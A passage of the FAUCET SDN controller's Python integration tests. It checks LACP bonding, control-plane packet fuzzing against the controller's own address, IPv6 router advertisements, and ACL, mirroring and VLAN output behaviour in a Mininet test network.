# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGSA]
# FAUCET should have this state (0x3e/62)
# Actor State: 0x3e, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...0 = LACP Activity: Passive
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGS*]
lag_ports = (1, 2)
synced_state_txt = r"""
Slave Interface: \S+-eth0
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 1
port number: %d
port state: 62
Slave Interface: \S+-eth1
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: \d+
Partner Churned Count: \d+
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 2
port number: %d
port state: 62
""".strip() % tuple(get_lacp_port_id(self.port_map['port_%u' % i]) for i in lag_ports)
lacp_timeout = 5
def prom_lacp_up_ports():
lacp_up_ports = 0
for lacp_port in lag_ports:
port_labels = self.port_labels(self.port_map['port_%u' % lacp_port])
lacp_state = self.scrape_prometheus_var('port_lacp_state', port_labels, default=0)
lacp_up_ports += 1 if lacp_state == 3 else 0
return lacp_up_ports
def require_lag_up_ports(expected_up_ports):
for _ in range(lacp_timeout * 10):
if prom_lacp_up_ports() == expected_up_ports:
break
time.sleep(1)
self.assertEqual(prom_lacp_up_ports(), expected_up_ports)
def require_linux_bond_up():
for _retries in range(lacp_timeout * 2):
result = first_host.cmd('cat /proc/net/bonding/%s|sed "s/[ \t]*$//g"' % bond)
result = '\n'.join([line.rstrip() for line in result.splitlines()])
with open(os.path.join(self.tmpdir, 'bonding-state.txt'), 'w') as state_file:
state_file.write(result)
if re.search(synced_state_txt, result):
break
time.sleep(1)
self.assertTrue(
re.search(synced_state_txt, result),
msg='LACP did not synchronize: %s\n\nexpected:\n\n%s' % (
result, synced_state_txt))
# Start with ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
# Deconfigure bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member))
# Configure bond interface
self.quiet_commands(first_host, (
('ip link add %s address 0e:00:00:00:00:99 '
'type bond mode 802.3ad lacp_rate fast miimon 100') % bond,
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond))
# Add bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set dev %s master %s' % (bond_member, bond),))
for _flaps in range(2):
# All ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
# Pick a random port to come up.
up_port = random.choice(lag_ports)
self.set_port_up(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
# We have connectivity with only one port.
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
# We have connectivity with two ports.
require_lag_up_ports(2)
require_linux_bond_up()
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
# We have connectivity if that random port goes down.
self.set_port_down(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
self.set_port_up(self.port_map['port_%u' % port])
class FaucetUntaggedIPv4LACPMismatchTest(FaucetUntaggedIPv4LACPTest):
"""Ensure remote LACP system ID mismatch is logged."""
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
for i, bond_member in enumerate(bond_members):
bond = 'bond%u' % i
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member,
('ip link add %s address 0e:00:00:00:00:%2.2x '
'type bond mode 802.3ad lacp_rate fast miimon 100') % (bond, i * 2 + i),
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond,
'ip link set dev %s master %s' % (bond_member, bond)))
self.wait_until_matching_lines_from_faucet_log_files(r'.+actor system mismatch.+')
class FaucetUntaggedIPv4ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_ping_fragment_controller(self):
first_host = self.hosts_name_ordered()[0]
first_host.cmd('ping -s 1476 -c 3 %s' % self.FAUCET_VIPV4.ip)
self.one_ipv4_controller_ping(first_host)
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
packets = 1000
fuzz_template = 'python3 -c \"from scapy.all import * ; scapy.all.send(%s, count=%u)\"'
for fuzz_cmd in (
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=0))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('IP(dst=\'%s\')/fuzz(%s(type=8))' % (self.FAUCET_VIPV4.ip, 'ICMP'), packets),
fuzz_template % ('fuzz(%s(pdst=\'%s\'))' % ('ARP', self.FAUCET_VIPV4.ip), packets)):
fuzz_out = first_host.cmd(mininet_test_util.timeout_cmd(fuzz_cmd, 180))
self.assertTrue(
re.search('Sent %u packets' % packets, fuzz_out), msg='%s: %s' % (
fuzz_cmd, fuzz_out))
self.one_ipv4_controller_ping(first_host)
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(5):
self.one_ipv4_ping(first_host, second_host.IP())
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.flap_all_switch_ports()
class FaucetUntaggedIPv4ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.one_ipv4_controller_ping(first_host)
# Try 64 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4)
# Try 128 byte icmp packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV4, size=128)
class FaucetUntaggedIPv6RATest(FaucetUntaggedTest):
FAUCET_MAC = "0e:00:00:00:00:99"
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fe80::1:254/64", "fc00::1:254/112", "fc00::2:254/112", "10.0.0.254/24"]
faucet_mac: "%s"
""" % FAUCET_MAC
CONFIG = """
advertise_interval: 5
""" + CONFIG_BOILER_UNTAGGED
def test_ndisc6(self):
first_host = self.hosts_name_ordered()[0]
for vip in ('fe80::1:254', 'fc00::1:254', 'fc00::2:254'):
self.assertEqual(
self.FAUCET_MAC.upper(),
first_host.cmd('ndisc6 -q %s %s' % (vip, first_host.defaultIntf())).strip())
def test_rdisc6(self):
first_host = self.hosts_name_ordered()[0]
rdisc6_results = sorted(list(set(first_host.cmd(
'rdisc6 -q %s' % first_host.defaultIntf()).splitlines())))
self.assertEqual(
['fc00::1:0/112', 'fc00::2:0/112'],
rdisc6_results)
def test_ra_advertise(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether dst 33:33:00:00:00:01',
'ether src %s' % self.FAUCET_MAC,
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [], timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'ethertype IPv6 \(0x86dd\), length 142',
r'fe80::1:254 > ff02::1:.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s' % (ra_required, tcpdump_txt))
def test_rs_reply(self):
first_host = self.hosts_name_ordered()[0]
tcpdump_filter = ' and '.join((
'ether src %s' % self.FAUCET_MAC,
'ether dst %s' % first_host.MAC(),
'icmp6',
'ip6[40] == 134',
'ip6 host fe80::1:254'))
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, [
lambda: first_host.cmd(
'rdisc6 -1 %s' % first_host.defaultIntf())],
timeout=30, vflags='-vv', packets=1)
for ra_required in (
r'fe80::1:254 > fe80::.+ICMP6, router advertisement',
r'fc00::1:0/112, Flags \[onlink, auto\]',
r'fc00::2:0/112, Flags \[onlink, auto\]',
r'source link-address option \(1\), length 8 \(1\): %s' % self.FAUCET_MAC):
self.assertTrue(
re.search(ra_required, tcpdump_txt),
msg='%s: %s (%s)' % (ra_required, tcpdump_txt, tcpdump_filter))
class FaucetUntaggedIPv6ControlPlaneFuzzTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_flap_ping_controller(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.add_host_ipv6_address(second_host, 'fc00::1:2/112')
for _ in range(5):
self.one_ipv6_ping(first_host, 'fc00::1:2')
for host in first_host, second_host:
self.one_ipv6_controller_ping(host)
self.flap_all_switch_ports()
def test_fuzz_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
fuzz_success = False
packets = 1000
count = 0
abort = False
def note(*args):
error('%s:' % self._test_name(), *args + tuple('\n'))
# Some of these tests have been slowing down and timing out,
# So this code is intended to allow some debugging and analysis
for fuzz_class in dir(scapy.all):
if fuzz_class.startswith('ICMPv6'):
fuzz_cmd = ("from scapy.all import * ;"
"scapy.all.send(IPv6(dst='%s')/fuzz(%s()),count=%u)" %
(self.FAUCET_VIPV6.ip, fuzz_class, packets))
out, start, too_long = '', time.time(), 30 # seconds
popen = first_host.popen('python3', '-c', fuzz_cmd)
for _, line in pmonitor({first_host: popen}):
out += line
if time.time() - start > too_long:
note('stopping', fuzz_class, 'after >', too_long, 'seconds')
note('output was:', out)
popen.terminate()
abort = True
break
popen.wait()
if 'Sent %u packets' % packets in out:
count += packets
elapsed = time.time() - start
note('sent', packets, fuzz_class, 'packets in %.2fs' % elapsed)
fuzz_success = True
if abort:
break
note('successfully sent', count, 'packets')
self.assertTrue(fuzz_success)
note('pinging', first_host)
self.one_ipv6_controller_ping(first_host)
note('test_fuzz_controller() complete')
class FaucetUntaggedIPv6ControlPlaneTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["fc00::1:254/112"]
"""
CONFIG = """
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
def test_fping_controller(self):
first_host = self.hosts_name_ordered()[0]
self.add_host_ipv6_address(first_host, 'fc00::1:1/112')
self.one_ipv6_controller_ping(first_host)
# Try 64 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6)
# Try 128 byte icmp6 packets
self.verify_controller_fping(first_host, self.FAUCET_VIPV6, size=128)
class FaucetTaggedAndUntaggedDiffVlanTest(FaucetTest):
N_TAGGED = 2
N_UNTAGGED = 4
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "tagged"
101:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
tagged_vlans: [100]
%(port_3)d:
native_vlan: 101
%(port_4)d:
native_vlan: 101
"""
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=2, n_untagged=2, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_separate_untagged_tagged(self):
tagged_host_pair = self.hosts_name_ordered()[:2]
untagged_host_pair = self.hosts_name_ordered()[2:]
self.verify_vlan_flood_limited(
tagged_host_pair[0], tagged_host_pair[1], untagged_host_pair[0])
self.verify_vlan_flood_limited(
untagged_host_pair[0], untagged_host_pair[1], tagged_host_pair[0])
# hosts within VLANs can ping each other
self.retry_net_ping(hosts=tagged_host_pair)
self.retry_net_ping(hosts=untagged_host_pair)
# hosts cannot ping hosts in other VLANs
self.assertEqual(
100, self.ping([tagged_host_pair[0], untagged_host_pair[0]]))
class FaucetUntaggedACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedEgressACLTest(FaucetUntaggedTest):
REQUIRES_METADATA = True
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acl_out: 1
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_port5001_blocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
self.ping_all_when_learned()
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=egress_acl_table)
def test_port5002_notblocked(self):
egress_acl_table = self.scrape_prometheus_var(
'faucet_config_table_names',
labels={'table_name': 'egress_acl'}
)
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=egress_acl_table)
class FaucetUntaggedDPACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
dp_acls: [1]
""" + CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetUntaggedNoReconfACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
actions:
allow: 1
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
opstatus_reconf: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
matches = {
'in_port': int(self.port_map['port_1']),
'tcp_dst': 5001,
'eth_type': IPV4_ETH,
'ip_proto': 6}
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_down(self.port_map['port_1'])
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
self.set_port_up(self.port_map['port_1'])
self.ping_all_when_learned()
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.wait_until_matching_flow(
matches, table_id=self._PORT_ACL_TABLE, actions=[])
class FaucetUntaggedACLTcpMaskTest(FaucetUntaggedACLTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
# Match packets > 1023
tcp_dst: 1024/1024
actions:
allow: 0
- rule:
actions:
allow: 1
"""
def test_port_gt1023_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(1024, first_host, second_host, mask=1024)
self.verify_tp_dst_notblocked(1023, first_host, second_host, table_id=None)
class FaucetUntaggedVLANACLTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
acls:
1:
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
actions:
allow: 1
vlans:
100:
description: "untagged"
acl_in: 1
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_port5001_blocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_blocked(
5001, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
def test_port5002_notblocked(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=self._VLAN_ACL_TABLE)
class FaucetUntaggedOutputOnlyTest(FaucetUntaggedTest):
CONFIG = """
interfaces:
%(port_1)d:
output_only: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1'])},
table_id=self._VLAN_TABLE,
actions=[])
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertEqual(100.0, self.ping((first_host, second_host)))
self.assertEqual(0, self.ping((third_host, second_host)))
class FaucetUntaggedACLMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
def test_eapol_mirrored(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_eapol_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedOrderedACLOutputMirrorTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
allow: 1
output:
- ports: [%(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, mirror_host = self.hosts_name_ordered()[0:3]
self.verify_ping_mirrored(first_host, second_host, mirror_host)
class FaucetUntaggedACLMirrorDefaultAllowTest(FaucetUntaggedACLMirrorTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
actions:
mirror: %(port_3)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetMultiOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetMultiOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
200:
acls:
multi_out:
- rule:
actions:
output:
- ports: [%(port_2)d, %(port_3)d]
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: multi_out
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 200
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host, third_host, fourth_host = self.hosts_name_ordered()[0:4]
tcpdump_filter = ('icmp')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
third_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (third_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, third_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % third_host.IP(), tcpdump_txt))
tcpdump_txt = self.tcpdump_helper(
fourth_host, tcpdump_filter, [
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, fourth_host.IP())))])
self.assertFalse(re.search(
'%s: ICMP echo request' % fourth_host.IP(), tcpdump_txt))
class FaucetUntaggedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
vlan_vid: 123
set_fields:
- eth_dst: "06:06:06:06:06:06"
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- vlan_vid: 123
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = ('icmp and ether dst 06:06:06:06:06:06')
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [123, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiVlansOrderedOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
- set_fields:
- eth_dst: "06:06:06:06:06:06"
- vlan_vids: [123, 456]
- port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
# we expected to see the rewritten address and VLAN
tcpdump_filter = 'vlan'
tcpdump_txt = self.tcpdump_helper(
second_host, tcpdump_filter, [
lambda: first_host.cmd(
'arp -s %s %s' % (second_host.IP(), '01:02:03:04:05:06')),
lambda: first_host.cmd(' '.join((self.FPINGS_ARGS_ONE, second_host.IP())))])
self.assertTrue(re.search(
'%s: ICMP echo request' % second_host.IP(), tcpdump_txt))
self.assertTrue(re.search(
'vlan 456.+vlan 123', tcpdump_txt))
class FaucetUntaggedMultiConfVlansOutputTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
acls:
1:
- rule:
dl_dst: "01:02:03:04:05:06"
actions:
output:
set_fields:
- eth_dst: "06:06:06:06:06:06"
vlan_vids: [{vid: 123, eth_type: 0x88a8}, 456]
port: %(port_2)d
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
